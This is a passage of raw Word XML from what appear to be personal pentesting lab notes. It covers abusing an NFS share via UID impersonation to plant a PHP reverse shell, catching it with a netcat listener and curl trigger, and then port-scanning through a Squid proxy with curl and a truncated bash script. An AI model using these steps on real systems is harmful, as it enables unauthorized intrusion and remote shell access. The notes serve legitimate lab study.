        <w:t xml:space="preserve">Having assumed the UID/GID of 2017, we have successfully impersonated the directory's owner and can now, under the assumption that the share has been configured to allow </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rw privileges</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, write arbitrary files to that directory.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F95">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We now add a reverse php shell,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId1047">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">pentestmonkey's</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and save it as shell.php in the webserver's filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl the script into the mount, and this will affect the original directory, so the website will have the reverse shell now. Make sure to edit the reverse shell to include correct numbers (like local IP, local port)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS (Network File System) provides a direct link between the client (your local machine) and the server.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you mount an NFS share locally (e.g., /mnt/1), you are working on the same files that exist on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F99">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While on one shell we set up a netcat listener, all that's left to do is curl the script we just added to the web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://10.10.11.191/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">where "shell.php" is the name of the reverseshell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F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A0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h0kepk9ks67l" w:id="423"/>
      <w:bookmarkEnd w:id="423"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Squid proxy (squid-cache)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1048">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Squid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port 3128 — Squid Proxy 4.14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are familiar with proxies,</w:t>
      </w:r>
      <w:hyperlink r:id="rId1049">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1050">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Burp Suite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is another web proxy we use quite frequently. In summary, rather than directly access that dirty slow internet, this service is acting as a go-between from the server to the outside world at large. It offers security (allegedly) and speed improvements in the form of caching frequent destinations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId1051">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HackTricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives us some tools to work with.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="517" name="image494.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image494.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105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2FA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA9">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, we may be able to use Squid to scan itself. We want to use the -i argument in curl to show the response code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#To scan itself on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i --proxy http://$IP:3128 http://$IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#To scan itself on port 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i --proxy http://$IP:3128 http://$IP:443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#To scan itself on port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i --proxy http://$IP:3128 http://$IP:8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3433763" cy="1425232"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67" name="image59.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image59.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1053"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3433763" cy="1425232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get a hit on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doing them one at a time is a bit tedious. My notes contain a bash script that someone gave me. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This Bash script automates testing whether certain ports on a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">target IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are reachable through a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — and specifically whether they return an HTTP status code </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OK) when accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Proxy details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy_address="192.168.x.x"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy_port="3128"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Target IP and ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">target_ip="192.168.x.x"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ports=("80" "443" "8000" "8080") #Feel free to add additional ports in the same format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
